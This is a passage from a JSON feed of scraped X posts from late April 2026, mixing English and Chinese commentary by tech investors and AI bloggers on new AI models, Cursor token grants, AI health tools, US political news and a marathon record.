irrationality of the human mind!\n\nSuperintelligent machines can't come fast enough because the real problem is not intelligence in the world.\n\nIt's the utter lack of it.", + "url": "https://x.com/ylecun/status/2048433973177573559", + "published_at": "2026-04-26T16:08:11+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://x.com/ylecun/status/2048432684930654430", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://x.com/sama/status/2048428561481265539", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://x.com/sama/status/2048426122854228141", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://x.com/HarryStebbings/status/2048418806867870115", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Pinned: Been testing NanoClaw for a few days, hooked it up to OpenRouter's free inclusionai/ling-2.6-1t:free model. The speed is absolutely wild.\n\nNanoClaw is already lightweight and snappy. Add @AntLingAGI's blazing-fast inference to the mix, and you get near-instant responses. Perfect combo!", + "url": "https://x.com/dingyi/status/2048416578396655905", + "published_at": "2026-04-26T14:59:04+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://x.com/paulg/status/2048413815675539816", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://x.com/paulg/status/2048413578789634100", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "牛逼,卡神又出教程了\n\n4美分/天、KiteSim香港卡,免实名+独享虚拟号\n\n马上跟着教程申请一张!!!", + "url": "https://x.com/gkxspace/status/2048412096665145411", + "published_at": "2026-04-26T14:41:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://x.com/paulg/status/2048411898081583547", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://x.com/paulg/status/2048411021329453562", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://x.com/HarryStebbings/status/2048400836024283246", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://x.com/ylecun/status/2048399621492236615", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://x.com/paulg/status/2048396013816152216", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》\n @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。\n\n 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。\n 2. 0xAA @0xAA_Science 北大计算机博士,WTF Academy创始人。\n 3. 比特币橙子 @oragnes 比特币持有者、加密投资人,同时热衷 AI 与 Vibe Coding,自建了 AI Agents 工具平台 OwlClawHub。\n 4. 铁锤人 @lxfater AI博主,用AI协助创业,维护GitHub 3w star项目。\n 5. 雪踏乌云 @Pluvio9yte 大厂程序员,专注分享 Vibe Coding、AI 编程与出海实战干货。\n 6. 凡人小北 @frxiaobei 商业与管理咨询顾问、AI 战略顾问,长期在真实业务中实践 AIGC 落地。\n 7. Berryxia @berryxia 专注构建AI工具、系统Prompt,热爱设计与分享Prompt。\n 8. 奶昔🥤 @realNyarime Naixi Networks创始人,专注eSIM与奶昔论坛。\n 9. Ding @dingyi 产品设计师,运营 SaasPick、TopFeed 等多个独立产品,拥有15万粉丝。\n 10. CuiMao @CuiMao AI开发者博主,专注深度学习、NVIDIA与ComfyUI,建免费AI学习群。\n 11. Leo @runes_leo AI × Crypto 独立构建者,Runesgang 符文堂创始人,专注比特币生态与链上量化研究。\n 12. 泊舟 @bozhou_ai 2.1万粉AI博主,AI程序员&Vibe编码者,专注构建Agent与Prompt。\n 13. Jason Zhu @GoSailGlobal 独立开发者,专注 SaaS 出海与 AI 内容分享,并创建了 Agent Skills 聚合站。\n 14. 余温 @gkxspace AI博主,05年连续创业者,专注AI产品构建与商业化,项目营收7位数+。\n 15. Steven Lynn @Stv_Lynn FirstLabAI主持人与Crazy Saturday活动主办者。", + "url": "https://x.com/bozhou_ai/status/2048390603030032670", + "published_at": "2026-04-26T13:15:51+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "So DESIGN.md files are basically Tailwind base CSS files?\n\nhttps://designdotmd.directory/", + "url": "https://x.com/dingyi/status/2048386895995191344", + "published_at": "2026-04-26T13:01:07+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵", + "url": "https://x.com/bozhou_ai/status/2048386685399142532", + "published_at": "2026-04-26T13:00:17+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://x.com/paulg/status/2048370801833828507", + "published_at": "2026-04-26T11:57:10+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的!\n\n2:但是甲方需要 4K 图。或者 PSD 图层!\n\n3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。\nMD 居然给我做了!改给了我一个分层压缩包!\n\n4:里面的图片居然是 4K 尺寸的!\n\n5:所以我们能通过这个方法获得 GPT 的 4K 图片!", + "url": "https://x.com/frxiaobei/status/2048366332639674706", + "published_at": "2026-04-26T11:39:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Design 虽好,但是额度不够用啊😮‍💨", + "url": "https://x.com/frxiaobei/status/2048356561131905177", + "published_at": "2026-04-26T11:00:35+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI", + "url": "https://x.com/frxiaobei/status/2048319988826820941", + "published_at": "2026-04-26T08:35:15+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "都快猝死了烧了两天才 $695,靠 human in the loop 一个月肯定是烧不完 $10000 的。\n\n突然发现他们的 Cloud agents 很好用,云端就不会因为本地机器的性能问题卡住了,还能执行自动化。再加上这个 multitask,应该可以在一个月内花光 token 了。", + "url": "https://x.com/dingyi/status/2048309013675216966", + "published_at": "2026-04-26T07:51:39+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。\n\n另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。\n\nhttps://github.com/AmazingAng/auth2api", + "url": "https://x.com/0xAA_Science/status/2048296373569941533", + "published_at": "2026-04-26T07:01:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://x.com/ylecun/status/2048293118781296734", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "中国群友的幻想集合:\n\n1. 自动化做自媒体\n2. 自动炒股票赚钱\n\n这些都是普通人都能参与的玩意", + "url": "https://x.com/lxfater/status/2048292547966210069", + "published_at": "2026-04-26T06:46:13+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "每次刷到这张图都悲从中来。", + "url": "https://x.com/frxiaobei/status/2048284683767812133", + "published_at": "2026-04-26T06:14:58+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "早上去爱康国宾做了个年度体检,往年都会直接丢给 chatgpt,今年直接小程序内用了爱康家的 ikkie 健康管家。\n\n虽然做的一言难尽,但医疗 AI 这条线很明显出现了一些底层的变化。\n\n以前那套拿着报告去问 ChatGPT 的玩法有个隐含的前提,问题是我自己定义的。\n现在逻辑完全反转, AI 拿到我的全量数据,然后反推出应该关心什么。\n\n在这个形态下我就转变成一个被持续监控和解释的对象。这听起来有点不舒服,但在医疗场景里这是合理的,因为绝大多数情况下我根本不知道该问什么。\n\n所以带来的就是 Prompt 在这个场景里开始失效\n为什么?\n因为 prompt 是把复杂现实压缩成一段文本。而我又描述不清楚,但是健康数据本来就是高维的跨时间的。我尝试一次性用 prompt 去描述信息损失是非常大。\n\n这也是为什么近半年会有 Agent 更懂自己的感觉,其实核心原因是长年累月的输入更真实了。\n\n随着数据的累积, ChatGPT 在人与 AI 的关系中扮演的角色也开始从信息解释器变成健康调度器。\n\n举个例子:\n一个异常指标,在传统 ChatGPT 流程里是解释 → 风险提示 → 建议去医院\n\n但在 AI 健康管家这种体系里理论上可以变成\n识别异常 → 判断风险等级 → 匹配历史数据 → 推荐复查 → 触发预约 → 跟踪结果\n\n也就是从一个认知闭环变成一个行动闭环。这一步是健康类 agent 真正有价值的地方(当然其他垂直场景都类似)\n\n但医疗 AI 还有那个老生常谈的问题,谁来承担责任。\n通用大模型理论上可以无限接近正确,实际上现在已经超越了所有的医生,但它不承担责任,所以它的输出永远是建议。\n\n所以在当前国家的体制下我更看到一些民营性质的医院先走出来。\n\n并且在整个链路上,数据的重要性也比想象中的还要大很多。", + "url": "https://x.com/frxiaobei/status/2048280586318672269", + "published_at": "2026-04-26T05:58:41+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "有什么 skill 能把一个设计系统拆解就好了,有吗?", + "url": "https://x.com/lxfater/status/2048264304261312720", + "published_at": "2026-04-26T04:53:59+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。\n\nopus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。", + "url": "https://x.com/0xAA_Science/status/2048254571622113742", + "published_at": "2026-04-26T04:15:19+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "嗨 @nikitabier @elonmusk\n\n你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。\n\n我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。", + "url": "https://x.com/wolfyxbt/status/2048250984644960630", + "published_at": "2026-04-26T04:01:04+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事!\n\n枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。", + "url": "https://x.com/0xAA_Science/status/2048229814172275062", + "published_at": "2026-04-26T02:36:56+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "好久不见,宝子们,近来可好啊", + "url": "https://x.com/chuxiaeth/status/2048229604784308266", + "published_at": "2026-04-26T02:36:06+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://x.com/sama/status/2048224374264885396", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽,川普又被枪击了 😱", + "url": "https://x.com/wolfyxbt/status/2048223317019316568", + "published_at": "2026-04-26T02:11:07+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "笑死了,看到这个人写了很长一篇文章给每马斯克和 X 团队,说为什么总把他的创作者收益停掉。他说:我一直坚持高质量的原创啊!\n\n我看了一眼,全是这种胡编乱造 AI 生成的擦边色情小短文。。。流量自然很高。\n\n还是那句话,外国人只是单纯,不是傻逼。", + "url": "https://x.com/dingyi/status/2048215016877519215", + "published_at": "2026-04-26T01:38:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://x.com/sama/status/2048165186482389253", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://x.com/sama/status/2048160448340767038", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://x.com/sama/status/2048160404376105179", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: New video is up: \n\n📈The Week in Charts - breaking down the most important charts and themes in markets...\n\nhttps://www.youtube.com/watch?v=p5e0ThPjIAg", + "url": "https://x.com/charliebilello/status/2048128721286992166", + "published_at": "2026-04-25T19:55:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://x.com/ylecun/status/2048118689258487857", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/quote-bud…", + "url": "https://x.com/Stv_Lynn/status/2048109932751560818", + "published_at": "2026-04-25T18:40:34+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像", + "url": "https://x.com/Stv_Lynn/status/2048109929203212615", + "published_at": "2026-04-25T18:40:33+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: github.com/stvlynn/Stakka", + "url": "https://x.com/Stv_Lynn/status/2048109925612851296", + "published_at": "2026-04-25T18:40:32+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: 2. 继续 push 一下 stekka\n之前没有做过移动端,很大一部分原因是 sonnet-3.5 时代还没法稳定生成 swift,一直在用 react native 做一些简单小应用\n现在发现主流 SOTA 模型已经能很稳定地产出 swift 了\n自动化测试也通过 AXE 搞定了✅", + "url": "https://x.com/Stv_Lynn/status/2048109922936910037", + "published_at": "2026-04-25T18:40:32+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Cursor 送的 10000 刀,我拿来做了什么\n\n昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录\n\n1. 写了个主页\n想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构\n(文案请忽略不代表最终效果)\n\n感觉吃上细糠了!", + "url": "https://x.com/Stv_Lynn/status/2048109919266852875", + "published_at": "2026-04-25T18:40:31+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: agent.creao.ai/signup?ref=Ws…", + "url": "https://x.com/gkxspace/status/2048070713601376712", + "published_at": "2026-04-25T16:04:44+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://x.com/ylecun/status/2048069805807128734", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://x.com/sama/status/2048062261584077149", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。", + "url": "https://x.com/wolfyxbt/status/2048056527731454048", + "published_at": "2026-04-25T15:08:21+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://x.com/paulg/status/2048043843690561556", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: x.com/gkxspace/status/204803…", + "url": "https://x.com/gkxspace/status/2048035672078844248", + "published_at": "2026-04-25T13:45:29+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。\n\n简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。\n\n我的提示词:\n我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套", + "url": "https://x.com/gkxspace/status/2048035527459319854", + "published_at": "2026-04-25T13:44:55+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "生财有术、得到新商学,哪个更好一些\n\n最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下\n\n你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔", + "url": "https://x.com/gkxspace/status/2048032521942626343", + "published_at": "2026-04-25T13:32:58+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: Image", + "url": "https://x.com/wolfyxbt/status/2048032308637442215", + "published_at": "2026-04-25T13:32:07+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "2019 年,孙哥放了巴菲特的鸽子;\n2026 年,嗯哼放了特朗普的鸽子。\n\n币圈真是个神奇的地方!", + "url": "https://x.com/wolfyxbt/status/2048031889789972748", + "published_at": "2026-04-25T13:30:27+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://x.com/paulg/status/2048017824895909901", + "published_at": "2026-04-25T12:34:34+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。\n\n从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工程、Agent、代码实践,可以很自然地聊一个小时,很多地方甚至比我理解得更深。\n\n但也有不少同学,学习成绩很好,计算机基础也扎实,只是因为家庭条件或预算有限,平时只能用国内中转站或更便宜的国产模型套餐,这个差距非常现实。现在最好的国产模型和国外一线模型,在 模型综合能力上大概还有半年左右的时间差。以前没有 AI 的时候,资源差距最多只是效率差一点,现在会直接影响视野、实践深度和自信心。\n\n这件事我最近一直在琢磨,对一些本来很有潜力的学生来说,只是因为每个月几十美元的门槛,就少接触了很多东西,我觉得挺可惜。想起我当时读大学的时候其实也经常阆中羞涩,好在大二认识了不少大牛学长带着我开始做商业项目养好了自己,挺感谢当时很耐心教我技术的各种朋友。\n\n所以我想做一个很小的尝试:拿一部分 X 发推收益,资助几位学习成绩不错、喜欢计算机、但家庭条件不太宽裕的同学,给他们提供几个月 Claude Code 或类似 AI Coding 工具的订阅,让他们真正体验一下目前比较好的模型和开发方式。\n\n不过我自己平时也比较忙,不太可能一个人长期处理申请、筛选、核验和跟进。所以也想顺便邀请一些对此有想法的朋友一起做。比如高校老师、学生负责人、开源社区成员,或者本身就在做教育、公益、开发者社区的朋友,可以一起帮忙想一个更靠谱的机制。\n\n这件事我暂时不想做大,也不想做成很复杂。先从小规模实验开始,比如每期 5 到 6 个同学,每人 3 到 4 个月,甚至也可以每周来找我视频问一些问题。想着优先看推荐、作品、学习记录和真实使用反馈,尽量避免变成单纯发钱或者拼谁会写申请,当然现在能上 X 的大学生应该不缺这个钱,所以还是需要看有没有更好的渠道。\n\n如果你有靠谱渠道,或者愿意一起参与规则设计、推荐、审核、跟进,欢迎私信我。能把这件事做得更可信一点,也许真的能帮到几个本来就很有潜力的同学。", + "url": "https://x.com/Stv_Lynn/status/2048011261473128477", + "published_at": "2026-04-25T12:08:29+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": 